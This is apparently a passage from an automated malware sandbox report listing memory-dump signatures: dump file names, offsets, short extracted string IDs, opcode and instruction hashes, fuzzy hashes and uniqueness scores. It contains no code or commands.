                                                                                                                                                                                        • Source File: 00000004.00000002.424617240.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: @jn$@jn$@jn$@jn$@jn$@jn$@jn$@jn$@jn$clm
                                                                                                                                                                                        • API String ID: 0-2488772544
                                                                                                                                                                                        • Opcode ID: a1ac7a84aba322a227f62d39af6d304eaee91c3fd06da3773fc50960fb40daa6
                                                                                                                                                                                        • Instruction ID: dd5bc29722f75e2d5221214bb98b193a77de2d2e418dd5ebd51fe7f347073132
                                                                                                                                                                                        • Opcode Fuzzy Hash: a1ac7a84aba322a227f62d39af6d304eaee91c3fd06da3773fc50960fb40daa6
                                                                                                                                                                                        • Instruction Fuzzy Hash: D1023A30A01205CFDB14EF64E484AADB7B2FF84308F15C969D54A8F666DB71EC86CB91
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000004.00000002.424617240.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: @jn$@jn$@jn$@jn$@jn$@jn$@jn
                                                                                                                                                                                        • API String ID: 0-634048027
                                                                                                                                                                                        • Opcode ID: 189a26871cf28a3e48ef7b28dd71ae4e8447a8d8c7b8f2114e5f13305f58b276
                                                                                                                                                                                        • Instruction ID: 81cdab6205d941ed12a1abc3f2b626f18fcb35da66d80daac4a073cd686cda8d
                                                                                                                                                                                        • Opcode Fuzzy Hash: 189a26871cf28a3e48ef7b28dd71ae4e8447a8d8c7b8f2114e5f13305f58b276
                                                                                                                                                                                        • Instruction Fuzzy Hash: 30915231700206DBDB24EF65D48566EB3A6FFD0214F01CD29D65A8BAB1DB70FC898B91
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000004.00000002.415693647.0000000007040000.00000040.00000001.sdmp, Offset: 07040000, based on PE: false
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: ,~Gi$,~Gi$,~Gi$,~Gi$,~Gi$,~Gi$,~Gi
                                                                                                                                                                                        • API String ID: 0-588255558
                                                                                                                                                                                        • Opcode ID: 3222b39f1e934e9a65fae4f5e58860dc6ca90bf6efd20e41420e437fa968894f
                                                                                                                                                                                        • Instruction ID: 09c3dd7e8e45d7b851b91135baf03e61d0c67bd387d18fa5a5924fe31a3e4307
                                                                                                                                                                                        • Opcode Fuzzy Hash: 3222b39f1e934e9a65fae4f5e58860dc6ca90bf6efd20e41420e437fa968894f
                                                                                                                                                                                        • Instruction Fuzzy Hash: 3031EA343041149BDB19A634F89CA3F62EBEBDA148B55891FD4069F3A2CF34AC861FD1
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000004.00000002.415693647.0000000007040000.00000040.00000001.sdmp, Offset: 07040000, based on PE: false
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: ,~Gi$,~Gi$,~Gi$,~Gi$,~Gi$,~Gi$,~Gi
                                                                                                                                                                                        • API String ID: 0-588255558
                                                                                                                                                                                        • Opcode ID: ef8f7ec6b5253fd8999f03a1223115ca929605b0aaee3df766fd5dae7650b730
                                                                                                                                                                                        • Instruction ID: c4a257fbef95b8ea1af6e95a2b8d4de751c420c8bc02c148c6c391c2d2092544
                                                                                                                                                                                        • Opcode Fuzzy Hash: ef8f7ec6b5253fd8999f03a1223115ca929605b0aaee3df766fd5dae7650b730
                                                                                                                                                                                        • Instruction Fuzzy Hash: 5331C9343040049BE719A635B89CA3F31FFEBDA148B554A2ED5079F3A6CF249C861BD2
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000004.00000002.415693647.0000000007040000.00000040.00000001.sdmp, Offset: 07040000, based on PE: false
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: D{k$D{k$D{k$D{k$D{k$D{k$D{k
                                                                                                                                                                                        • API String ID: 0-1190155413
                                                                                                                                                                                        • Opcode ID: 8aba9bf4cb5d54aa5e18bb721ed86f74fd01c075cc4fdbee75b0b35607bbbefc
                                                                                                                                                                                        • Instruction ID: db84fbc9b8d91dbf72195f31a63b43ce2ba9af835652479fedaca9e34056e9fa
                                                                                                                                                                                        • Opcode Fuzzy Hash: 8aba9bf4cb5d54aa5e18bb721ed86f74fd01c075cc4fdbee75b0b35607bbbefc
                                                                                                                                                                                        • Instruction Fuzzy Hash: 8941C670E0024ADFCB44EFB4F9585ADBBB5FF88304B109919E505A7760EB356A818F62
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000004.00000002.424617240.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: @jn$@jn$@jn$@jn
                                                                                                                                                                                        • API String ID: 0-222823189
                                                                                                                                                                                        • Opcode ID: 0ae9d78130ba3c6562e860a08092bcdd2fe02882c7214d514632ae481b02e82b
                                                                                                                                                                                        • Instruction ID: 59849281df5b7316849eec13829b52193b846f9152c115457fd7c2109f9fbf59
                                                                                                                                                                                        • Opcode Fuzzy Hash: 0ae9d78130ba3c6562e860a08092bcdd2fe02882c7214d514632ae481b02e82b
                                                                                                                                                                                        • Instruction Fuzzy Hash: 34A1A0317002029BDB28EF74D45567E73E2EBC4314F118929D55A9B6A1EF70EC8A8B92
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000004.00000002.424617240.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: <Ks$D+n$D+n$D{k
                                                                                                                                                                                        • API String ID: 0-204044517
                                                                                                                                                                                        • Opcode ID: d64938a088ef80f5cad7e6ae35fb930bd5fa8302ac6ebeb5e620a7e089978a8f
                                                                                                                                                                                        • Instruction ID: c3d5c5bd666a12eeaa9aab9b77264486b823c4dfb219acd3ac597b9d4a034cc3
                                                                                                                                                                                        • Opcode Fuzzy Hash: d64938a088ef80f5cad7e6ae35fb930bd5fa8302ac6ebeb5e620a7e089978a8f
                                                                                                                                                                                        • Instruction Fuzzy Hash: 3C716C767046408FC719DF68D59962EBBF2EF88350715846AE816CB3A2DF30EC46CB91
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%